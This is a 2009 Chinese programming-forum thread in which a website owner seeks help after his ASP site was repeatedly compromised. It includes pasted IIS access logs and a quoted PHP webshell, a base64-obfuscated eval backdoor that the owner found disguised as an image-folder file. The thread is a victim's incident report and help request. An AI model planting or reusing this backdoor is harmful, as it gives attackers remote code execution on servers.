asp文件被写入恶意代码问题 - 编程论坛

#2

lele20072009-10-20 10:16

后来我检查网站内是否有其它不是我自己的文件。。在文件夹  html（这里存放的是：eWebEditor编辑器）。。
在html目录里多了一个文件。。名为：anli.php  打开里面是一步段加密码了的代码。。当时看到时删除了。。发不了代码了。其它地方正常。。

后来我把anli.php删除。。及清掉所有的写入代码。。整站正常运行后第二天出现的问题还是这个。。
检查了html文件夹。。也在  eWebEditor的一个文件：html/Include/Startup.asp  这个文件加上：

<%
if session("admin")="" then
   response.write "<script language='javascript'>alert('对不起，请勿尝试非法操作！');</script>"
   response.write "<script language='javascript'>parent.location.href='/';</script>"
   response.end
end if
%>

加上后还是不行。。。eWebEditor  这个html编辑器的安全应该如何做的？我估计也是这个的问题。。。现在删除了它和后台文件。。观察中。。。

#3

lele20072009-10-20 10:22

<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?>

文件找到了。。images图片文件夹下也有一个。。。名为：gifimg.php 上面是代码。。还有一个空文件夹名为：mbkq

有没有什么办法可以检查注入或者记录入侵过程的？

#4

lele20072009-10-20 11:01

有没朋友遇上相似的问题的？指点一下呃。。或者了解点的。。交流一下。。看能否交流出好的解决办法。。

#5

msgj2009-10-20 15:38

在Dreamweaver中查找本地 “<script src=http:// ></script>”
并替换为空。

#6

lele20072009-10-20 17:39

替换后。。解决了这个问题。。

上传后，不久。。或者第二天。同样的问题就再次出现了。。请问这个是哪里的问题？

#7

aspic2009-10-20 18:05

这个东西不是程序漏洞就是服务器出问题了~

#8

friends5712009-10-20 18:54

应该是网站留言或上传东西时出现的，

#9

lele20072009-10-21 09:57

今天早上同样的问题又出现了。。

出现这个问题应该从哪里检查问题修补？

#10

lele20072009-10-21 09:58

#Date: 2009-10-19 01:34:28
#Fields: time cs-method cs-uri-stem c-ip sc-status sc-bytes cs-bytes
01:34:28 GET /style.css 219.134.222.43 200 2048 433
01:34:28 GET /index.asp 219.134.222.43 200 8042 255
01:34:28 GET /images/dianhua.jpg 219.134.222.43 200 2048 442
01:34:28 GET /images/xiao.gif 219.134.222.43 200 2048 438
01:34:28 GET /images/qqconnection.gif 219.134.222.43 200 2048 446
01:34:28 GET /images/biao.jpg 219.134.222.43 200 2048 438
01:34:28 GET /images/aoyun.jpg 219.134.222.43 200 4096 439
01:34:28 GET /flash/lele.js 219.134.222.43 200 2048 436
01:34:28 GET /images/bg.jpg 219.134.222.43 200 2048 437
01:34:28 GET /images/logo_nav.gif 219.134.222.43 200 2048 442
01:34:28 GET /flash/banner.swf 219.134.222.43 200 2048 469
01:34:28 GET /images/menu.gif 219.134.222.43 200 2048 438
01:34:28 GET /images/l_moh.jpg 219.134.222.43 200 4096 439
01:34:28 GET /images/l_moh1.jpg 219.134.222.43 200 2048 440
01:34:28 GET /images/l_moh2.jpg 219.134.222.43 200 2048 440
01:34:28 GET /flash/02.jpg 219.134.222.43 200 2048 522
01:34:28 GET /images/bottom_bg.jpg 219.134.222.43 200 2048 442
01:34:28 GET /flash/01.jpg 219.134.222.43 200 2048 522
01:34:28 GET /flash/04.jpg 219.134.222.43 200 2048 522
01:34:29 GET /flash/05.jpg 219.134.222.43 200 2048 522
01:34:29 GET /flash/03.jpg 219.134.222.43 200 2048 521
01:34:31 GET /favicon.ico 219.134.222.43 200 7589 289
01:42:23 GET /robots.txt 220.181.94.237 404 1445 69
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-10-19 02:00:45
#Fields: time cs-method cs-uri-stem c-ip sc-status sc-bytes cs-bytes
02:00:44 GET /index.asp 119.122.143.22 200 8042 234
02:00:44 GET /style.css 119.122.143.22 200 3877 322
02:00:45 GET /flash/lele.js 119.122.143.22 200 2245 326
02:00:45 GET /images/menu.gif 119.122.143.22 200 3242 328
02:00:46 GET /images/aoyun.jpg 119.122.143.22 200 23976 329
02:00:46 GET /images/l_moh1.jpg 119.122.143.22 200 21905 330
02:00:46 GET /images/logo_nav.gif 119.122.143.22 200 32702 332
02:00:46 GET /images/dianhua.jpg 119.122.143.22 200 28012 331
02:00:46 GET /images/biao.jpg 119.122.143.22 200 28901 328
02:00:46 GET /images/qqconnection.gif 119.122.143.22 200 28276 336
02:00:46 GET /images/xiao.gif 119.122.143.22 200 27086 328
02:00:46 GET /images/l_moh.jpg 119.122.143.22 200 27884 329
02:00:47 GET /images/navhover.gif 119.122.143.22 200 804 351
02:00:47 GET /flash/03.jpg 119.122.143.22 200 24354 431
02:00:47 GET /images/bottom_bg.jpg 119.122.143.22 200 13107 333
02:00:48 GET /flash/02.jpg 119.122.143.22 200 23065 431
02:00:48 GET /images/bg.jpg 119.122.143.22 200 68353 326
02:00:48 GET /flash/01.jpg 119.122.143.22 200 32655 431
02:00:48 GET /flash/04.jpg 119.122.143.22 200 25545 431
02:00:48 GET /flash/05.jpg 119.122.143.22 200 30441 431
02:00:48 GET /images/l_moh2.jpg 119.122.143.22 200 23571 330
02:00:49 GET /flash/banner.swf 119.122.143.22 200 357946 358
02:07:41 GET /index.asp 119.122.143.22 200 8042 253
02:07:41 GET /style.css 119.122.143.22 304 192 431
02:07:41 GET /images/bg.jpg 119.122.143.22 304 192 435
02:07:41 GET /images/logo_nav.gif 119.122.143.22 304 191 440
02:07:42 GET /flash/banner.swf 119.122.143.22 304 192 467
02:07:42 GET /images/dianhua.jpg 119.122.143.22 304 192 440
02:07:42 GET /images/xiao.gif 119.122.143.22 304 191 436
02:07:42 GET /images/qqconnection.gif 119.122.143.22 304 191 444
02:07:42 GET /images/biao.jpg 119.122.143.22 304 191 436
02:07:42 GET /images/menu.gif 119.122.143.22 304 191 436
02:07:42 GET /flash/lele.js 119.122.143.22 304 191 434
02:07:42 GET /images/aoyun.jpg 119.122.143.22 304 191 437
02:07:42 GET /images/l_moh2.jpg 119.122.143.22 304 191 438
02:07:42 GET /images/l_moh1.jpg 119.122.143.22 304 191 438
02:07:42 GET /images/l_moh.jpg 119.122.143.22 304 191 437
02:07:42 GET /flash/01.jpg 119.122.143.22 304 191 520
02:07:42 GET /images/bottom_bg.jpg 119.122.143.22 304 190 440
02:07:42 GET /flash/03.jpg 119.122.143.22 304 190 519
02:07:42 GET /flash/02.jpg 119.122.143.22 304 191 520
02:07:42 GET /flash/04.jpg 119.122.143.22 304 191 520
02:07:42 GET /flash/05.jpg 119.122.143.22 304 191 520
02:20:09 GET /images/navhover.gif 119.122.143.22 200 804 439
02:20:12 GET /favicon.ico 119.122.143.22 200 7589 287
02:35:24 GET /family.asp 220.181.94.237 200 0 408
02:35:45 GET /xiaodu.asp 220.181.94.237 200 0 408
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-10-19 03:03:36
#Fields: time cs-method cs-uri-stem c-ip sc-status sc-bytes cs-bytes
03:03:36 GET /robots.txt 220.181.94.237 404 1445 69
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-10-19 03:23:00
#Fields: time cs-method cs-uri-stem c-ip sc-status sc-bytes cs-bytes
03:23:00 GET /index.asp 219.131.196.66 200 8061 116
03:23:01 GET /index.asp 219.131.196.66 200 8061 116
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-10-19 04:07:27
#Fields: time cs-method cs-uri-stem c-ip sc-status sc-bytes cs-bytes
04:07:27 GET /show.asp 220.181.94.237 200 4297 412
04:07:47 GET /show.asp 220.181.94.237 200 4297 412
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-10-19 04:27:38
#Fields: time cs-method cs-uri-stem c-ip sc-status sc-bytes cs-bytes
04:27:38 GET /robots.txt 220.181.94.237 404 1445 69
04:30:26 GET /index.asp 218.17.55.130 200 8674 389
04:32:02 GET /index.asp 218.17.55.130 200 8674 201
04:32:14 GET /style.css 218.17.55.130 200 3877 297
04:32:24 GET /images/logo_nav.gif 218.17.55.130 200 32702 307
04:32:27 GET /images/bg.jpg 218.17.55.130 200 68353 301
04:32:27 GET /images/dianhua.jpg 218.17.55.130 200 28012 306
04:32:27 GET /images/xiao.gif 218.17.55.130 200 27086 303
04:32:29 GET /images/qqconnection.gif 218.17.55.130 200 28276 311
04:32:29 GET /flash/banner.swf 218.17.55.130 200 357946 332
04:32:29 GET /images/biao.jpg 218.17.55.130 200 28901 303
04:32:29 GET /flash/lele.js 218.17.55.130 200 2338 301
04:32:30 GET /images/menu.gif 218.17.55.130 200 3242 303
04:32:30 GET /images/aoyun.jpg 218.17.55.130 200 23976 304
04:32:31 GET /images/l_moh1.jpg 218.17.55.130 200 21905 305
04:32:31 GET /images/l_moh2.jpg 218.17.55.130 200 23571 305
04:32:31 GET /images/bottom_bg.jpg 218.17.55.130 200 13107 308
04:32:31 GET /images/l_moh.jpg 218.17.55.130 200 27884 304
04:32:36 POST /images/gifimg.php 65.182.191.191 200 175 2001
04:32:36 POST /html/anli.php 65.182.191.191 200 160 212
04:44:44 GET /images/navhover.gif 218.17.55.130 200 804 345
04:52:59 GET /zx.asp 218.17.55.130 200 6911 520
04:53:25 GET /images/ico.gif 218.17.55.130 200 2262 393
04:53:26 GET /images/top.jpg 218.17.55.130 200 19354 393
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-10-19 05:26:47
#Fields: time cs-method cs-uri-stem c-ip sc-status sc-bytes cs-bytes
05:26:47 GET /index.asp 119.122.143.22 200 8674 234
05:26:56 GET /style.css 119.122.143.22 200 0 412
05:26:56 GET /images/bg.jpg 119.122.143.22 200 0 416
05:27:06 GET /images/logo_nav.gif 119.122.143.22 200 0 421
05:27:06 GET /flash/banner.swf 119.122.143.22 200 0 448
05:27:07 GET /images/dianhua.jpg 119.122.143.22 200 0 421
05:27:07 GET /images/xiao.gif 119.122.143.22 200 0 417
05:27:07 GET /images/qqconnection.gif 119.122.143.22 200 0 425
05:27:07 GET /images/biao.jpg 119.122.143.22 200 0 417
05:27:07 GET /images/aoyun.jpg 119.122.143.22 200 0 418
05:27:07 GET /images/menu.gif 119.122.143.22 200 0 417
05:27:07 GET /flash/lele.js 119.122.143.22 200 2338 415
05:27:08 GET /images/l_moh.jpg 119.122.143.22 200 0 418
05:27:08 GET /images/l_moh1.jpg 119.122.143.22 200 0 419
05:27:08 GET /images/l_moh2.jpg 119.122.143.22 200 0 419
05:27:08 GET /images/bottom_bg.jpg 119.122.143.22 200 0 421
05:27:08 GET /flash/01.jpg 119.122.143.22 200 0 501
05:27:08 GET /flash/02.jpg 119.122.143.22 200 0 501
05:27:08 GET /flash/03.jpg 119.122.143.22 200 0 500
05:27:08 GET /flash/04.jpg 119.122.143.22 200 0 501
05:27:08 GET /flash/05.jpg 119.122.143.22 200 0 501
05:27:49 GET /index.asp 220.181.94.237 200 8693 398
05:29:37 GET /images/navhover.gif 119.122.143.22 200 804 439
05:30:40 GET /images/navhover.gif 119.122.143.22 200 804 439
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-10-19 05:46:22
#Fields: time cs-method cs-uri-stem c-ip sc-status sc-bytes cs-bytes
05:46:21 GET /index.asp 113.106.106.131 200 8693 521
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-10-19 06:16:12
#Fields: time cs-method cs-uri-stem c-ip sc-status sc-bytes cs-bytes
06:16:11 GET /images/navhover.gif 219.134.222.43 200 804 334
06:19:41 GET /index.asp 218.17.143.143 200 8674 207
06:19:47 GET /style.css 218.17.143.143 200 3877 303
06:19:48 GET /images/bg.jpg 218.17.143.143 200 30720 307
06:19:48 GET /images/logo_nav.gif 218.17.143.143 200 10240 313
06:19:48 GET /flash/banner.swf 218.17.143.143 200 22528 339
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-10-19 06:38:37
#Fields: time cs-method cs-uri-stem c-ip sc-status sc-bytes cs-bytes
06:38:36 GET /index.asp 119.136.230.122 200 8674 318
06:38:51 GET /index.asp 219.134.222.43 200 8674 283
06:38:55 GET /style.css 119.136.230.122 200 3877 414
06:38:56 GET /images/bg.jpg 119.136.230.122 200 68353 418
06:38:56 GET /images/logo_nav.gif 119.136.230.122 200 32702 424
06:38:58 GET /flash/lele.js 119.136.230.122 200 2338 418
06:38:58 GET /images/menu.gif 119.136.230.122 200 3242 420
06:38:58 GET /images/dianhua.jpg 119.136.230.122 200 28012 423
06:38:58 GET /images/aoyun.jpg 119.136.230.122 200 23976 421
06:38:58 GET /images/xiao.gif 119.136.230.122 200 27086 420
06:38:58 GET /images/qqconnection.gif 119.136.230.122 200 28276 428
06:38:58 GET /images/biao.jpg 119.136.230.122 200 28901 420
06:38:59 GET /images/l_moh2.jpg 119.136.230.122 200 23571 422
06:39:00 GET /flash/03.jpg 119.136.230.122 200 24354 504
06:39:00 GET /flash/02.jpg 119.136.230.122 200 23065 504
06:39:00 GET /flash/05.jpg 119.136.230.122 200 30441 504
06:39:00 GET /flash/04.jpg 119.136.230.122 200 25545 504
06:39:00 GET /images/l_moh1.jpg 119.136.230.122 200 21905 422
06:39:01 GET /images/l_moh.jpg 119.136.230.122 200 27884 421
06:39:01 GET /images/bottom_bg.jpg 119.136.230.122 200 13107 425
06:39:02 GET /flash/01.jpg 119.136.230.122 200 32655 504
06:39:02 GET /flash/banner.swf 119.136.230.122 200 357946 450
06:39:05 GET /style.css 219.134.222.43 200 2048 461
06:39:05 GET /images/bg.jpg 219.134.222.43 200 2048 465
06:39:06 GET /images/logo_nav.gif 219.134.222.43 200 2048 470
06:39:06 GET /flash/banner.swf 219.134.222.43 200 2048 497
06:39:11 GET /images/xiao.gif 219.134.222.43 200 2048 466
06:39:11 GET /images/dianhua.jpg 219.134.222.43 200 0 470
06:39:11 GET /images/aoyun.jpg 219.134.222.43 200 2048 467
06:39:11 GET /images/biao.jpg 219.134.222.43 200 2048 466
06:39:11 GET /images/qqconnection.gif 219.134.222.43 200 2048 474
06:39:11 GET /flash/lele.js 219.134.222.43 200 2338 464
06:39:11 GET /images/menu.gif 219.134.222.43 200 2048 466
06:43:44 GET /index.asp 119.136.230.122 200 8463 448
06:45:17 GET /style.css 119.136.230.122 200 3877 542
06:45:17 GET /images/bg.jpg 119.136.230.122 304 192 546
06:45:17 GET /flash/banner.swf 119.136.230.122 304 192 578
06:45:17 GET /images/logo_nav.gif 119.136.230.122 304 191 551
06:45:21 GET /images/dianhua.jpg 119.136.230.122 304 192 551
06:45:21 GET /images/aoyun.jpg 119.136.230.122 304 191 548
06:45:21 GET /flash/lele.js 119.136.230.122 304 192 546
06:45:21 GET /images/qqconnection.gif 119.136.230.122 304 191 555
06:45:21 GET /images/biao.jpg 119.136.230.122 304 191 547
06:45:21 GET /images/menu.gif 119.136.230.122 304 191 547
06:45:21 GET /images/xiao.gif 119.136.230.122 304 191 547
06:45:22 GET /images/l_moh.jpg 119.136.230.122 304 191 548
06:45:22 GET /images/l_moh1.jpg 119.136.230.122 304 191 549
06:45:22 GET /flash/02.jpg 119.136.230.122 304 191 631
06:45:22 GET /images/bottom_bg.jpg 119.136.230.122 304 190 551
06:45:22 GET /flash/01.jpg 119.136.230.122 304 191 631
06:45:22 GET /images/l_moh2.jpg 119.136.230.122 304 191 549
06:45:22 GET /flash/04.jpg 119.136.230.122 304 191 631
06:45:22 GET /flash/03.jpg 119.136.230.122 304 190 630
06:45:22 GET /flash/05.jpg 119.136.230.122 304 191 631
06:49:59 GET /index.asp 119.136.230.122 500 514 495
06:50:39 GET /index.asp 119.136.230.122 500 514 495
06:50:41 GET /index.asp 119.136.230.122 500 514 495
06:50:43 GET /index.asp 119.136.230.122 500 514 495
06:50:43 GET /index.asp 119.136.230.122 500 514 495
06:50:45 GET /index.asp 119.136.230.122 500 514 495
06:51:01 GET /index.asp 119.136.230.122 500 514 495
06:51:03 GET /index.asp 119.136.230.122 500 514 495
06:51:17 GET /index.asp 119.136.230.122 500 514 495
06:51:18 GET /index.asp 119.136.230.122 500 514 495
06:51:19 GET /index.asp 119.136.230.122 500 514 495
06:51:20 GET /index.asp 119.136.230.122 500 514 495
06:51:20 GET /index.asp 119.136.230.122 500 514 495
06:51:20 GET /index.asp 119.136.230.122 500 514 495
06:51:21 GET /index.asp 119.136.230.122 500 514 495
06:51:39 GET /index.asp 119.136.230.122 200 7834 495
06:51:39 GET /style.css 119.136.230.122 200 3876 542
06:51:40 GET /images/logo_nav.gif 119.136.230.122 304 191 551
06:51:40 GET /images/xiao.gif 119.136.230.122 304 191 547
06:51:40 GET /images/biao.jpg 119.136.230.122 304 191 547
06:51:40 GET /images/aoyun.jpg 119.136.230.122 304 191 548
06:51:40 GET /images/menu.gif 119.136.230.122 304 191 547
06:51:40 GET /flash/lele.js 119.136.230.122 200 2244 546
06:51:40 GET /images/l_moh2.jpg 119.136.230.122 304 191 549
06:51:40 GET /images/bottom_bg.jpg 119.136.230.122 304 190 551
06:51:40 GET /images/l_moh1.jpg 119.136.230.122 304 191 549
06:51:40 GET /images/l_moh.jpg 119.136.230.122 304 191 548
06:51:40 GET /images/qqconnection.gif 119.136.230.122 200 28274 555
06:51:40 GET /images/dianhua.jpg 119.136.230.122 200 28011 551
06:51:40 GET /images/bg.jpg 119.136.230.122 200 68352 546
06:51:43 GET /style.css 119.136.230.122 304 191 541
06:51:43 GET /index.asp 119.136.230.122 200 7834 495
06:51:43 GET /images/logo_nav.gif 119.136.230.122 304 191 551
06:51:43 GET /images/bg.jpg 119.136.230.122 304 191 545
06:51:43 GET /images/xiao.gif 119.136.230.122 304 191 547
06:51:43 GET /images/dianhua.jpg 119.136.230.122 304 191 550
06:51:43 GET /images/menu.gif 119.136.230.122 304 191 547
06:51:43 GET /flash/lele.js 119.136.230.122 304 190 544
06:51:43 GET /images/aoyun.jpg 119.136.230.122 304 191 548
06:51:43 GET /images/qqconnection.gif 119.136.230.122 304 189 553
06:51:43 GET /images/biao.jpg 119.136.230.122 304 191 547
06:51:44 GET /images/bottom_bg.jpg 119.136.230.122 304 190 551
06:51:44 GET /images/l_moh2.jpg 119.136.230.122 304 191 549
06:51:44 GET /images/l_moh1.jpg 119.136.230.122 304 191 549
06:51:44 GET /images/l_moh.jpg 119.136.230.122 304 191 548
06:51:50 GET /images/navhover.gif 119.136.230.122 200 804 462
06:51:50 GET /xiangmu.asp 119.136.230.122 200 3656 454
06:51:50 GET /upfile/200910127455415.jpg 119.136.230.122 404 0 480
06:51:50 GET /images/top.jpg 119.136.230.122 200 19353 468
06:51:50 GET /images/ico.gif 119.136.230.122 200 2262 468
06:51:52 GET /xiangmu.asp 119.136.230.122 200 3656 454
06:51:52 GET /upfile/200910127455415.jpg 119.136.230.122 404 1445 480
06:51:52 GET /images/logo_nav.gif 119.136.230.122 304 191 562
06:51:52 GET /images/bg.jpg 119.136.230.122 304 191 556
06:51:52 GET /style.css 119.136.230.122 304 191 552
06:51:52 GET /images/bottom_bg.jpg 119.136.230.122 304 190 562
06:51:52 GET /images/top.jpg 119.136.230.122 304 191 557
06:51:52 GET /images/ico.gif 119.136.230.122 304 191 557
06:51:52 GET /images/qqconnection.gif 119.136.230.122 304 189 564
06:51:53 GET /anli.asp 119.136.230.122 200 3677 462
06:51:53 GET /upfile/2009101622179674.gif 119.136.230.122 404 0 478
06:51:54 GET /xiaodu.asp 119.136.230.122 200 9686 461
06:52:21 GET /upfile/2009101622179674.gif 119.136.230.122 200 219161 478
06:52:28 GET /zx.asp 119.136.230.122 200 6212 457
06:52:30 GET /family.asp 119.136.230.122 200 3670 460
06:52:34 GET /upfile/2009928184946704.jpg 119.136.230.122 200 591815 481
06:52:51 GET /contact.asp 119.136.230.122 200 4442 465
06:52:52 GET /anli.asp 119.136.230.122 200 3677 463
06:52:54 GET /xiangmu.asp 119.136.230.122 200 3656 463
06:52:54 GET /upfile/200910127455415.jpg 119.136.230.122 200 63488 481
06:52:54 GET /xiaodu.asp 119.136.230.122 200 9686 465
06:52:55 GET /family.asp 119.136.230.122 200 3670 464
06:59:58 GET /index.asp 219.134.222.43 200 7901 236
06:59:58 GET /images/xiao.gif 219.134.222.43 200 2048 419
06:59:58 GET /images/biao.jpg 219.134.222.43 200 2048 419
06:59:58 GET /images/aoyun.jpg 219.134.222.43 200 2048 420
06:59:58 GET /style.css 219.134.222.43 200 3876 414
06:59:58 GET /flash/lele.js 219.134.222.43 200 2244 418
06:59:58 GET /images/logo_nav.gif 219.134.222.43 200 2048 423
06:59:58 GET /images/l_moh1.jpg 219.134.222.43 200 2048 421
06:59:58 GET /images/l_moh.jpg 219.134.222.43 200 2048 420
06:59:58 GET /images/l_moh2.jpg 219.134.222.43 200 2048 421
06:59:58 GET /images/bottom_bg.jpg 219.134.222.43 200 2048 423
06:59:59 GET /images/menu.gif 219.134.222.43 200 2048 419
06:59:59 GET /flash/01.jpg 219.134.222.43 200 2048 503
06:59:59 GET /flash/02.jpg 219.134.222.43 200 2048 503
06:59:59 GET /images/qqconnection.gif 219.134.222.43 200 28274 427
06:59:59 GET /flash/03.jpg 219.134.222.43 200 2048 521
06:59:59 GET /flash/04.jpg 219.134.222.43 200 2048 522
06:59:59 GET /flash/05.jpg 219.134.222.43 200 2048 522
06:59:59 GET /images/dianhua.jpg 219.134.222.43 200 28011 423
07:00:00 GET /images/bg.jpg 219.134.222.43 200 68352 418
07:00:01 GET /flash/banner.swf 219.134.222.43 200 357945 450
07:00:58 GET /images/navhover.gif 119.136.230.122 304 190 561
07:00:59 GET /about.asp 119.136.230.122 200 4957 463
07:00:59 GET /style.css 119.136.230.122 304 191 551
07:00:59 GET /images/logo_nav.gif 119.136.230.122 304 191 561
07:00:59 GET /images/bg.jpg 119.136.230.122 304 191 555
07:00:59 GET /images/top.jpg 119.136.230.122 304 191 556
07:00:59 GET /images/ico.gif 119.136.230.122 304 191 556
07:00:59 GET /images/qqconnection.gif 119.136.230.122 304 189 563
07:00:59 GET /images/bottom_bg.jpg 119.136.230.122 304 190 561
07:01:02 GET /flash/banner.swf 119.136.230.122 200 357945 588
07:01:06 GET /xiangmu.asp 119.136.230.122 200 3656 464
07:01:06 GET /upfile/200910127455415.jpg 119.136.230.122 206 19419 591
07:01:07 GET /anli.asp 119.136.230.122 200 3677 463
07:01:07 GET /upfile/2009101622179674.gif 119.136.230.122 304 192 569
07:01:08 GET /contact.asp 119.136.230.122 200 4442 463
07:01:08 GET /xiaodu.asp 119.136.230.122 200 9686 465
07:01:09 GET /family.asp 119.136.230.122 200 3670 464
07:01:09 GET /upfile/2009928184946704.jpg 119.136.230.122 304 192 571
07:01:16 GET /contact.asp 119.136.230.122 200 4442 465
07:02:33 GET /contact.asp 119.136.230.122 200 4442 465
07:02:33 GET /style.css 119.136.230.122 304 191 553
07:02:34 GET /images/logo_nav.gif 119.136.230.122 304 191 563
07:02:34 GET /images/bg.jpg 119.136.230.122 304 191 557
07:02:34 GET /images/bottom_bg.jpg 119.136.230.122 304 190 563
07:02:34 GET /images/top.jpg 119.136.230.122 304 191 558
07:02:34 GET /images/ico.gif 119.136.230.122 304 191 558
07:02:34 GET /images/qqconnection.gif 119.136.230.122 200 27839 565
07:03:20 GET /anli.asp 119.136.230.122 200 3677 463
07:03:22 GET /xiaodu.asp 119.136.230.122 200 9686 462
07:03:22 GET /family.asp 119.136.230.122 200 3670 464
07:03:23 GET /xiaodu.asp 119.136.230.122 200 9686 464
07:03:23 GET /xiangmu.asp 119.136.230.122 200 3656 465
07:03:26 GET /index.asp 219.134.222.43 200 7834 327
07:03:26 GET /style.css 219.134.222.43 200 3876 368
07:03:26 GET /flash/lele.js 219.134.222.43 200 2244 372
07:03:27 GET /images/xiao.gif 219.134.222.43 200 27086 374
07:03:27 GET /images/dianhua.jpg 219.134.222.43 200 28011 377
07:03:27 GET /images/biao.jpg 219.134.222.43 200 28901 374
07:03:27 GET /images/qqconnection.gif 219.134.222.43 200 27837 382
07:03:27 GET /images/aoyun.jpg 219.134.222.43 200 23976 375
07:03:28 GET /images/logo_nav.gif 219.134.222.43 200 32702 378
07:03:28 GET /images/l_moh1.jpg 219.134.222.43 200 21905 376
07:03:28 GET /images/l_moh2.jpg 219.134.222.43 200 23571 376
07:03:28 GET /images/bottom_bg.jpg 219.134.222.43 200 13107 379
07:03:28 GET /images/l_moh.jpg 219.134.222.43 200 27884 375
07:03:28 GET /images/bg.jpg 219.134.222.43 200 68352 372
07:03:29 GET /images/menu.gif 219.134.222.43 200 3242 374
07:03:33 GET /images/navhover.gif 219.134.222.43 304 190 441
07:03:34 GET /zx.asp 219.134.222.43 200 6212 340
07:03:35 GET /images/ico.gif 219.134.222.43 200 2262 354
07:03:35 GET /images/top.jpg 219.134.222.43 200 19353 354
07:03:36 GET /contact.asp 119.136.230.122 200 4442 466
07:03:37 GET /anli.asp 119.136.230.122 200 3677 463
07:03:38 GET /xiangmu.asp 119.136.230.122 200 3656 463
07:03:43 GET /xiaodu.asp 119.136.230.122 200 9686 465
07:03:43 GET /family.asp 119.136.230.122 200 3670 464
07:03:44 GET /zx.asp 119.136.230.122 200 6212 460
07:03:44 GET /about.asp 119.136.230.122 200 4957 459
07:03:46 GET /zx.asp 119.136.230.122 200 6212 459
07:04:15 GET /style.css 119.136.230.122 304 191 556
07:04:15 GET /show.asp 119.136.230.122 200 10325 464
07:04:15 GET /flash/banner.swf 119.136.230.122 304 191 592
07:04:15 GET /images/logo_nav.gif 119.136.230.122 304 191 566
07:04:15 GET /images/bg.jpg 119.136.230.122 304 191 560
07:04:15 GET /images/bottom_bg.jpg 119.136.230.122 304 190 566
07:04:15 GET /images/top.jpg 119.136.230.122 304 191 561
07:04:15 GET /images/ico.gif 119.136.230.122 304 191 561
07:04:15 GET /images/qqconnection.gif 119.136.230.122 304 192 573
07:04:17 GET /show.asp 119.136.230.122 200 244 427
07:04:29 GET /images/navhover.gif 119.136.230.122 304 190 565
07:04:29 GET /xiaodu.asp 119.136.230.122 200 9686 468
07:04:30 GET /xiangmu.asp 119.136.230.122 200 3656 465
07:04:30 GET /upfile/200910127455415.jpg 119.136.230.122 304 192 571
07:04:35 GET /contact.asp 119.136.230.122 200 4442 466
07:04:36 GET /anli.asp 119.136.230.122 200 3677 463
07:04:36 GET /upfile/2009101622179674.gif 119.136.230.122 304 192 569
07:04:58 GET /contact.asp 119.136.230.122 200 4442 463
07:05:23 GET /index.asp 119.136.230.122 200 7834 412
07:05:23 GET /images/dianhua.jpg 119.136.230.122 304 191 551
07:05:23 GET /images/biao.jpg 119.136.230.122 304 191 548
07:05:23 GET /images/menu.gif 119.136.230.122 304 191 548
07:05:23 GET /flash/lele.js 119.136.230.122 304 190 545
07:05:23 GET /images/xiao.gif 119.136.230.122 304 191 548
07:05:23 GET /images/l_moh1.jpg 119.136.230.122 304 191 550
07:05:23 GET /images/l_moh2.jpg 119.136.230.122 304 191 550
07:05:23 GET /flash/01.jpg 119.136.230.122 304 191 632
07:05:23 GET /images/l_moh.jpg 119.136.230.122 304 191 549
07:05:23 GET /images/aoyun.jpg 119.136.230.122 304 191 549
07:05:23 GET /flash/02.jpg 119.136.230.122 304 191 632
07:05:23 GET /flash/03.jpg 119.136.230.122 304 190 631
07:05:23 GET /flash/04.jpg 119.136.230.122 304 191 632
07:05:23 GET /flash/05.jpg 119.136.230.122 304 191 632
07:06:08 GET /zx.asp 119.136.230.122 200 6212 450
07:07:57 GET /contact.asp 119.136.230.122 200 4442 461
07:08:46 GET /anli.asp 119.136.230.122 200 3677 463
07:08:50 GET /index.asp 119.136.230.122 200 7834 412
07:12:42 GET /index.asp 119.136.230.122 200 7834 412
07:12:44 GET /about.asp 119.136.230.122 200 4957 453
07:12:45 GET /family.asp 119.136.230.122 200 3670 463
07:12:45 GET /upfile/2009928184946704.jpg 119.136.230.122 304 192 571
07:12:46 GET /xiaodu.asp 119.136.230.122 200 9686 464
07:12:53 GET /xiaodu.asp 119.136.230.122 200 9686 464
07:12:53 GET /style.css 119.136.230.122 304 191 552
07:12:53 GET /images/bg.jpg 119.136.230.122 304 191 556
07:12:54 GET /images/logo_nav.gif 119.136.230.122 304 191 562
07:12:54 GET /images/bottom_bg.jpg 119.136.230.122 304 190 562
07:12:54 GET /images/top.jpg 119.136.230.122 304 191 557
07:12:54 GET /images/qqconnection.gif 119.136.230.122 304 192 569
07:12:54 GET /images/ico.gif 119.136.230.122 304 191 557
07:13:10 GET /anli.asp 119.136.230.122 200 3677 462
07:13:46 GET /index.asp 119.136.230.122 200 7834 412
07:16:17 GET /xiaodu.asp 119.136.230.122 200 9686 454
07:18:17 GET /html/ 119.136.230.122 403 354 417
07:18:23 GET /html/eWebEditor.asp 119.136.230.122 200 202 431
07:18:43 GET /html/eWebEditor.asp 119.136.230.122 200 202 431
07:18:43 GET /html/eWebEditor.asp 119.136.230.122 200 202 431
07:18:46 GET /html/eWebEditor.asp 119.136.230.122 200 202 431
07:23:21 GET /images/navhover.gif 219.134.222.43 304 0 447
07:23:21 GET /contact.asp 219.134.222.43 200 4442 351
07:23:21 GET /style.css 219.134.222.43 304 191 443
07:23:22 GET /images/qqconnection.gif 219.134.222.43 304 192 458
07:23:22 GET /images/bg.jpg 219.134.222.43 304 191 447
07:23:22 GET /images/ico.gif 219.134.222.43 304 191 448
07:23:22 GET /images/bottom_bg.jpg 219.134.222.43 304 190 453
07:23:22 GET /flash/banner.swf 219.134.222.43 304 191 479
07:23:22 GET /images/logo_nav.gif 219.134.222.43 304 191 453
07:23:22 GET /images/top.jpg 219.134.222.43 304 191 448
07:23:22 GET /images/navhover.gif 219.134.222.43 304 190 452
07:23:45 GET /style.css 119.136.230.122 304 191 541
07:23:45 GET /index.asp 119.136.230.122 200 7834 412
